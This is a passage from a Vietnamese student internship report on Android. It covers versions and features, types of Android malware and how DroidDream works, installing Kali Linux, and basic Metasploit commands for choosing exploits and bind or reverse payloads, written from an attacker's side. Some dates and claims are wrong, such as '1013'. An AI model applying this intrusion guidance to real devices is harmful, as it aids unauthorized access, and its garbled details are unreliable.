mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát triển bởi cộng
đồng phát triển để tạo ra các ứng dụng di động hoàn hảo.
1.3.2. Tính ngang bằng của các ứng dụng.
Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên
thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện
thoại. Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các
nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng
dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích.
1.3.3. Phá vỡ rào cản phát triển ứng dụng.
Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có thể kết hợp thông
tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên
bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển có thể xây
dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi họ
đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ
định vị toàn cầu GPS.
1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng
Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng
dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết được vị trí của thiết bị và cho
phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp.
Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 20
1.4.Các phiên bản của android
Lịch sử phiên bản của hệ điều hành di động Android bắt đầu với bản Android beta vào tháng 11
năm 2007. Phiên bản thương mại đầu tiên, Android 1.0, được phát hành vào tháng 9 năm 2008.
Android đang được phát triển bởi Google và Open Handset Alliance (OHA), và đã có một số bản
cập nhật cho hệ điều hành này kể từ khi ra mắt.
Từ tháng 4 2009, phiên bản Android được phát triển dưới tên mã là chủ đề bánh kẹo và phát hành
theo thứ tự bảng chữ cái: Cupcake (1.5), Donut (1.6), Eclair (2.0–2.1), Froyo (2.2–2.2.3),
Gingerbread (2.3–2.3.7), Honeycomb (3.0–3.2.6), Ice Cream Sandwich (4.0–4.0.4), Jelly Bean
(4.1–4.3), và KitKat (4.4). Vào 3 tháng 9 năm 2013, Google công bố rằng 1 tỉ thiết bị đã được kích
hoạt hiện sử dụng Android OS trên toàn cầu. Bản cập nhật Android gần đây nhất là KitKat 4.4, nó
được phát hành bản thương mại trên thiết bị 22 tháng 11 2013, thông qua cập nhật OTA.
Phiên bản API Tên Ngày phát hành
1.0 Cấp 1 23/9/ 2008
1.1 Cấp 2 9/2/2009
1.5 Cấp 3 Cupcake 30/4/2009
1.6 Cấp 4 Donut 15/9/2009
2.0 Cấp 5
Eclair
26/10/2009
2.0.1 Cấp 6 3/12/2009
2.1 Cấp 7 12/1/2010
2.2
Cấp 8 Froyo
20/5/2010
2.2.1 18/1/2011
2.2.2 22/1/2011
2.2.3 21/11/2011
2.3
Cấp 9 Gingerbread
6/12/2010
2.3.1 12/2010
2.3.2 1/2011
2.3.3
Cấp 10 Gingerbread
9/2/2011
2.3.4 28/4/2011
2.3.5 25/7/2011
2.3.6 2/9/2011
2.3.7 21/9/2011
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 21
3.0 Cấp 11
Honeycomb
22/2/2011
3.1 Cấp 12 10/5/2011
3.2
Cấp 13
15/7/2011
3.2.1 20/9/2011
3.2.2 30/8/2011
3.2.3
3.2.4 12/2011
3.2.5 1/2012
3.2.6 2/1012
4.0
Cấp 14
Ice Cream
Sandwich
19/10/2011
4.0.1 21/10/2011
4.0.2 28/11/2011
4.0.3 Cấp 15
16/12/2011
4.0.4 29/3/2012
4.1
Cấp 16 Jelly Bean
9/7/2012
4.1.1 23/7/2012
4.1.2 9/10/2012
4.2
Cấp 17
13/11/2012
4.2.1 27/11/2012
4.2.2 11/2/2013
4.3 Cấp 18
24/7/1013
4.3.1 3/10/2013
4.4
Cấp 19 KitKat
31/10/2013
4.4.1 5/12/2013
4.4.2 9/12/2013
4.4.3 2/6/2014
4.4.4 19/6/2014
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 22
1.5.Tỷ lệ sử dụng các phiên bản android
Phần lớn các thiết bị Android cho tới nay vẫn chạy hệ điều hành phiên bản 4.1.x Jelly Bean được
phát hành ngày 9 tháng 7 năm 2012 nhờ tính ổn định và hỗ trợ tốt các máy có cấu hình thấp cùng
với các phiên bản 4.x khác. Bên cạnh đó các thiết bị Android vẫn còn sử dụng các phiên bản cũ hơn
là 2.3 Gingerbread phát hành ngày 6 tháng 12 năm 2010.
Tỷ lệ sử dụng các phiên bản khác nhau tính đến ngày 20 tháng 7 năm 2014
1.6.So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich):
Android 2.3, tên mã là Gingerbread được phát hành vào ngày 6 tháng 12 năm 2010 và là một bản nâng
cấp của Android v2.2 Froyo. Các phiên bản 2.3 được thiết kế đặc biệt cho điện thoại thông minh, nó
được coi là một trong những phiên bản phổ biến nhất của Android cho điện thoại thông minh. Ngoài bố
trí đã có sẵn trên Froyo, công ty cung cấp các thay đổi như giao diện người dùng được cập nhật, tăng
tốc độ và sự đơn giản, hỗ trợ cho màn hình lớn hơn và độ phân giải cao, hỗ trợ cho hệ thống điện thoại
SIP VOIP, bàn phím ảo nhanh hơn và trực quan hơn, chức năng sao chép dán nâng cao, hỗ trợ NFC,
hiệu ứng âm thanh mới, quản lý download mới, hỗ trợ nhiều camera, hỗ trợ xem video WebM/VP8 và
AAC mã hóa âm thanh, cải thiện quản lý điện năng, chuyển từ YAFFS đến ext4 trên các thiết bị mới
hơn, âm thanh, đồ họa và cải tiến đầu vào cho các nhà phát triển trò chơi, đồng thời thu gom rác thải và
hỗ trợ cho các cảm biến nhiều hơn. Công ty cũng vận chuyển một cập nhật nhỏ cho Gingerbread theo
phiên bản 2.3.3-2.3.7. Những bản cập nhật được cung cấp tính năng mới như: hỗ trợ cho giọng nói hoặc
video chat, mở cửa phụ kiện hỗ trợ thư viện, cải tiến để ứng dụng gmail, hình ảnh động bóng cho danh
sách cuộn, cải tiến phần mềm máy ảnh và cải thiện hiệu quả pin.
Android 4.0 Ice Cream Sandwich đã được công khai phát hành vào ngày 19 Tháng 10 năm 2011. Các
Android 4.0 thật sự là một sự là một bản nâng cấp của 2.3 Gingerbread và được cung cấp một loạt các
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 23
tính năng mới. Android cũng đã có phiên bản 3.0, chỉ dành cho máy tính bảng. Phiên bản này về cơ bản
là một sự kết hợp của Android 2.3.x và Android 3.x. Công ty cung cấp các tính năng cập nhật như: nút
mềm, widgets, dễ dàng để tạo thư mục mới, cải thiện thư thoại trực quan, chức năng pinch-to-zoom,
chụp ảnh màn hình, bàn phím được cải thiện, khả năng truy cập các ứng dụng từ lockscreen, tính năng
mở khóa bằng nhận diện khuôn mặt, trình duyệt web theo thẻ, tự động đồng bộ hóa trình duyệt chrome
đánh dấu, kiểu chữ mới cho giao diện người dùng, cải thiện ứng dụng máy ảnh, được xây dựng trong
biên tập ảnh, bố trí bộ sưu tập mới, ứng dụng tích hợp với mạng xã hội, cập nhật trạng thái và hình ảnh
hi-res, khả năng tương thích NFC, tăng tốc phần cứng, quản lý wifi và quay video 1080p
1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt
Android 2.3 Android 4.0
Cần ít nhất 128 MB bộ nhớ có sẵn cho Kernel
và cho không gian người sử dụng
Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel và
cho không gian người sử dụng
Dung lượng Ram tối thiểu cần thiết là 150MB Dung lượng Ram tối thiểu cần thiết là 350 MB
Màn hình:
- Màn hình phải có kích cỡ ít nhất 2,5 inch
- Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779
(16:9)
- Công nghệ màn hình được sử dụng là
công nghệ “ Square pixels”
Màn hình:
- Màn hình phải có kích cỡ ít nhất
426x320
- Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85
(16:9)
Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý
Các API Android bao gồm trình quản lý
download các ứng dụng có thể sử dụng để tải dữ
liệu.Trình quản lí download phải có khả năng tải
tập tin có dung lượng ít nhất 55 MB
Các API Android bao gồm trình quản lý
download các ứng dụng có thể sử dụng để tải dữ
liệu.Trình quản lí download phải có khả năng tải
tập tin có dung lượng ít nhất 100 MB
1.6.2. Sự khác nhau về giao diện
Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm ứng
chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để xử lý các
đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn ra gần như ngay lập tức,
nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết bị để tạo phản hồi
rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốc kế, con quay hồi chuyển và
cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động khác của người
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 24
dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị
trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như đang điều khiển
vô-lăng.
Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các
thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn.
Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng
dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động, cập nhật tự động
như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính.
Màn hình chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao
diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt
hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên
Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình
chính, thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn. Phần
lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết
bị Android của họ để phân biệt với các hãng cạnh tranh.
Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết
nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng
hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián đoạn
hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng có thể nhấn vào
thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính
năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở ứng dụng
gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi.
Android 2.3 Android 4.0
Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn
Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Menu
Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà
không cần mở ứng dụng
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 25
1.6.3. Sự khác nhau về tính năng
Android 2.3 Android 4.0
Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet
Chỉ có thể xóa tất các các thông báo cùng lúc trên
trình quản lý
Chỉ có thể xóa riêng rẽ các thông báo cùng lúc
trên trình quản lý
Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình bị
khóa
Có thể thực hiện thêm 1 số tính năng khi màn
hình bị khoái ngoài trả lời , ngắt cuộc gọi như gửi
tin nhắn
Không có tính năng mở khóa màn hình nhận diện
khuôn mặt
Có tính năng mở khóa màn hình nhận diện khuôn
mặt
Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện
được tất cả các camera trên thiết bị
1.6.4. Sự khác nhau về giao thức mạng
Android 2.3 Android 4.0
Không hỗ trợ giao thức https Hỗ trợ giao thức https
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 26
2. Nghiên cứu về mã độc trong mỗi trường android 2.1.Malware là gì?
Malware (phần mềm độc hại) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính
được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc và thay đổi các thực thi của hệ điều hành
cũng như các chương trình ứng dụng mà không có sự cho phép của người dùng và bằng một cách
nào đó mà người dùng nếu không để ý cũng không thể phát hiện được những thay đổi đó.
Hình 1.
Phần mềm độc hại đã xuất hiện từ rất lâu trên những hệ điều hành máy tính như Windows, các máy
tính MAC và Linux (ở một mức độ thấp hơn), và bây giờ nó đã trở thành một mối nguy hại không
nhỏ cho các thiết bị di động chạy Android. Sự có mặt của Android khiến cho các phần mềm độc
hại thêm phần thích thú, tích cực tấn công hơn tới đông đảo người dùng Android. Nói về vấn đề
này, Timothy Armstrong, một chuyên gia bảo mật tại Kaspersky Lab, cho biết: “Malware trên
Android được phát hiện nhiều hơn hầu như mỗi ngày. Thời gian gần đây, chúng tôi đã phát hiện ra
ba nhà phát triển ứng dụng (mà có khi là từ cùng 1 người) với tên gọi MYOURNET, Kingmall2010,
we20092020 đã cung cấp các ứng dụng để tải về miễn phí trên Android Market, mà hầu hết các
ứng dụng đó đều chứa mã độc”.
Hình 2.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 27
Năm 2012 là năm thứ hai cho thấy sự bùng nổ của phần mềm độc hại cho Android. Từ tám chương
trình độc hại duy nhất vào tháng 1 năm 2011, tỷ lệ phát hiện trung bình hàng tháng phần mềm độc
hại mới tấn công vào Android trong năm 2011 đã lên đến hơn 800 mẫu. Trong năm 2012, Kaspersky
Lab đã xác định trung bình 6.300 mẫu phần mềm độc hại trên thiết bị di động mới mỗi tháng. Nhìn
chung, trong năm 2012 số lượng mẫu độc hại cho Android được biết đến nhiều tăng hơn tám lần.
2.2.Phân loại
Đa số các phần mềm độc hại Android có thể được chia thành ba nhóm chính dựa theo chức năng:
- SMS Trojans: bòn rút tài khoản di động của các nạn nhân bằng cách gửi tin nhắn SMS đến
các số điện thoại được đánh giá cao.
- Backdoors: cung cấp truy cập trái phép vào smartphone, cài đặt các chương trình độc hại
khác hoặc ăn cắp dữ liệu cá nhân của người dùng.
- Cuối cùng là các phần mềm gián điệp nhằm mục tiêu thu thập trái phép dữ liệu cá nhân,
chẳng hạn như sổ địa chỉ và mật khẩu (hoặc thậm chí hình ảnh cá nhân).
Trong nửa đầu năm 2012, Backdoors, tin nhắn SMS, Trojans và phần mềm gián điệp chiếm 51%
các phần mềm độc hại cho Android mới được phát hiện. Trong bảng xếp hạng Top Ten phần mềm
độc hại cho Android đã bị chặn bởi Kaspersky Mobile Security hoặc Kaspersky Tablet Security,
SMS Trojans là phổ biến nhất và các ứng dụng hiển thị quảng cáo không mong muốn cho người sử
dụng ở vị trí thứ hai. Ít phổ biến rộng rãi nhưng nguy hiểm nhất là Trojans ngân hàng trên di động
thường xuyên làm việc kết hợp với các máy tính để bàn, ví dụ như Carberp.
Nền tảng Android cho phép cài đặt phần mềm từ các nguồn không tin cậy, và là một trong những
cách tốt nhất để đảm bảo sự lây nhiễm từ việc cài đặt các chương trình từ những trang web đáng
ngờ. Tuy nhiên, phần mềm độc hại trên nền tảng phân phối ứng dụng chính thức Google Play là
một xu hướng bắt đầu vào năm 2011 và tiếp tục trong năm 2012, bất chấp những nỗ lực tốt nhất
của Google để làm giảm hoạt động tội phạm mạng. Một trong những ví dụ “khác thường” nhất của
phần mềm độc hại trên di động trong năm 2012 là "Find and Call", ứng dụng đã len lỏi được vào
Google Play cũng như kho ứng dụng của Apple.
2.3.Cơ chế hoạt động của Malware
Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware DroidDream.
Malware này hoạt động qua 2 giai đoạn:
Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng
dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị
của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.
Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một giấy phép đặc biệt cho phép
quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin
nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Một khi DroidDream
chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai,
DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này
nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Nghiên
cứu cài đặt HĐH Android trên các thiết bị laptop, smartphone.Không giống như giai đoạn đầu,
người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 28
động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng
hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc
của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà
điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong
việc phát hiện một hành vi bất thường trên chiếc smartphone của mình.
2.4.Mục đích của Malware DroidDream
DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của con
DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài
đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến đổi để gây
ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS có khả năng tự gửi tin nhắn mà
không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên
một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo,
Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp
nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi
tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. Hiện
nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực
sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối
nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều
hành này.
2.5.Dấu hiệu bị nhiễm các phần mềm độc hại
Cũng giống như trên máy tính, khi bị nhiễm malware, thiết bị Android của bạn sẽ có một số hành
động khác thường và bạn không thể thay đổi được bất kỳ điều gì.
- Sử dụng dữ liệu không rõ ràng: có rất nhiều phần mềm độc hại tồn tại để thu thập dữ liệu
về tài khoản, số thẻ tín dụng, danh bạ, vv... Một khi có được các thông tin này, nó sẽ tự động
được chuyển tiếp về cho người đã tạo ra nó. Và trong nhiều trường hợp, việc chuyển giao
thông tin này sẽ dẫn đến sự khác lạ trong sử dụng dữ liệu.
- Hiệu suất của thiết bị kém: tùy thuộc vào thời gian sử dụng và mức độ nghiêm trọng của
việc lây nhiễm mà hiệu suất điện thoại của bạn sẽ bị giảm đi nhiều hay ít, đặc biệt là khi bạn
đã khởi động lại thiết bị mà các vấn đề không được giảm bớt.
- Thời lượng pin bị giảm: do hầu hết các phần mềm độc hại đều được thiết kế để chạy nền
trong hệ thống, nên nó sẽ làm sụt giảm đáng kể thời lượng pin trên thiết bị của bạn.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 29
3. Xâm nhập android qua mạng local 3.1.Giới thiệu về Kali Linux
Trong những năm qua BackTrack là hệ điều hành được sử dụng nhiều nhất bởi các chuyên gia
đánh giá bảo mật. BackTrack bắt đầu xuất hiện vào năm 2006 và trong 7 năm qua nó đã không
ngừng cải tiến để đạt được một vị trí nhất định trong cộng đồng bảo mật trên khắp toàn thế giới.
Vì vậy, ngày nay thật khó để tìm thấy một người nào đó quan tâm đến an toàn thông tin mà
chưa từng nghe về BackTrack.
Tháng 3 năm 2013, Offensive Security đã tiến thêm một bước mới khi công bố phiên bản tiến
hóa của hệ điều hành BackTrack, tên của nó là Kali (được xem như phiên bản BackTrack 6), Kali
là tên nữ thần của người Hindu, hàm ý sự biến đổi và khả năng hủy diệt hay có lẽ là tên một môn
võ thuật của người Philippine ...
Để qua một bên chuyện tên với tuổi, Kali Linux là một OS rất hữu ích đối với những chuyên
gia đánh giá bảo mật, một OS tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kỳ
một chuyên gia đánh giá bảo mật nào cũng cần sử dụng đến khi tác nghiệp.
- Ưu điểm và Nhược điểm:
Đối với những người chưa biết BackTrack, nói một cách ngắn gọn BackTrack là một bản phân
phối Linux dựa trên nền tảng hệ điều hành Ubuntu, với nhiều công cụ bảo mật được phân loại rõ
ràng để sử dụng.
3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần
mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập
nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các
công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian.
Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó
cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các
công cụ.
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM.
Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra.
3.1.2. Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho
một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu
quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.
3.1.3. Khả năng tùy biến cao
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ
đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy
theo sở thích và thói quen sử dụng.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 30
3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với
BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn
toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn
trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn
toàn nữa.
3.2.Cài đặt Kali Linux
Trước tiên ta phải vào trang http://www.kali.org/downloads/ để download file ISO phiên bản mới
nhất về
Hình 3.
Sau đó, ta bắt đầu cài cặt theo các bước bên dưới:
Hình 4. Hình 5.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 31
Hình 6. Hình 7.
Hình 8. Hình 9.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 32
Hình 10. Hình 11.
Hình 12. Hình 13.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 33
Hình 14. Hình 15.
Hình 16.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 40
Hình 29.
3.3.Metasploit framework trong Kali linux
3.3.1. Giới thiệu
Metasploit framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode
(payload) để tấn công máy có lỗ hổng. Cùng với một số bộ công cụ bảo mật khác. Metasploit có cơ
sở dữ liệu chứa hàng ngàn shellcode, hàng ngàn exploit của các hệ điều hành, các chương trình hay
dịch vụ. Trong quá trình phát triển metasploit liên tục cập nhật các exploit... nên càng ngày nó càng
trở thành một bộ công cụ mạnh mẽ.
Metasploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn, nhưng đối với những hacker
thì nó thực sự là một công cụ vô cùng hữu ích (dùng để kiểm tra, khai thác lỗi, exploit…)
3.3.2. Sử dụng metasploit framework
3.3.2.1.Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà metasploit có hỗ trợ để khai
thác
Muốn chọn ta có thể dùng lệnh "show exploits" để hiện ra tất cả các exploit mà metasploit
framework có hỗ trợ.
Để dùng exploit nào đó ta dùng câu lệnh "use name_exploit" .Trong đó tham số name_exploit là
tên của exploit đc metasploit hỗ trợ.
Để biết thêm các thông tin về exploit mà ta đã chọn có thể dùng lệnh "info name_exploit".
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 41
Ví dụ: mình sử dụng một exploit sau khi đã liệt kê ra sẽ là:
use windows/manage/add_user_domain
3.3.2.2.Cấu hình module exploit đã chọn
Sau khi đã chọn một exploit với command use, việc tiếp theo là cấu hình các options mà exploit
này yêu cầu. Để rõ hơn exploit này nó yêu cầu cấu hình như thế nào, phải cấu hình những gì, ta sử
dụng lệnh "show options".
Khi sử dụng lệnh show option ta thường nhận đc một bảng gồm các cột như sau:
Name--------------Current Setting----------------Required---------------Description
Trong đó, ở cột required nếu giá trị là "yes" thì ta phải set giá trị cho tham số này, còn nếu là "no"
thì ta có thể set hoặc không. Quan trọng phải xem một số nó đã cấu hình mặc định cho rồi có thích
hợp với chúng ta hay không.
Ta dùng lệnh “set” để cấu hình những options của module đó.
Ngoài ra nó còn có thêm một số options khác, dùng "show advanced", "show evasion" để xem.
Sau khi cấu hình xong ta cần kiểm tra xem việc cấu hình đã đúng hay chưa. Để kiểm tra việc cấu
hình ta dùng lệnh "check" để xem mục tiêu có bị tấn công được hay không. Đây là một cách nhanh
để ta kiểm tra xem việt cấu hình các options bằng lệnh set có đúng hay không và mục tiêu thực sự
có lỗ hổng để khai thác được hay không. Nhưng không phải tất cả các exploit đều thực sự có thể
kiểm tra được bằng việc sự dụng lệnh check. Đôi khi ta phải thực sự exploit nó mới biết được.
3.3.2.3.Lựa chọn payload
Payload là một đoạn code đc chạy trên máy victim, dùng để thực hiện một số họat động nào đó,
hoặc dùng để kết nối về máy của hacker.
Vậy làm sao để có cái payload này trên máy của victim? Có 2 phương pháp chủ yếu được dùng. Đó
là gửi cho victim thông qua việc phân tính một lỗi, lỗ hổng nào đó trên hệ thống victim, từ đó đột
nhập và đưa đoạn payload này vào máy victim. Kiểu thứ 2 là gửi trực tiếp cho victim, chờ đợi
victim sơ ý nhận nó.
Để hiện thị các payloads tích hợp cho exploit hiện tại chúng ta đang dùng, ta dùng lệnh "show
payloads".
Tương ứng với mỗi OS khác nhau ta dùng một payload khác nhau, và phương pháp cũng khác nhau.
Các giao thức dùng cũng khác nhau... Nhìn chung đối với payload có thể phân ra làm 2 loại cơ bản
đó là bind payload và reverse payload. Khi nào ta dùng loại nào? Đây cũng là một vấn đề quan
trọng. Nếu như máy của chúng ta (đóng vai trò là hacker) đứng sau một tường lửa, thì lúc này ta
nên dùng bind payload. Mở một port trên máy tính và kết nối trực tiếp từ máy hacker đến máy
victim. Còn nếu như victim đứng sau một tường lửa, còn chúng ta thì không. Khi đó chúng ta dùng
reverse payload để connect ngược từ máy victim về máy chúng ta. Như vậy cho thấy khi tấn công
mục tiêu, ta phải tìm hiểu rõ ràng về mục tiêu, tìm kiếm tất cả các thông tin có thể có. Dựa vào đó
mà ta chọn cách thích hợp.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 42
Khi ta quyết định chọn một payload nào đó, dùng lệnh "set PAYLOAD name_payload" để chọn
payload cần dùng.
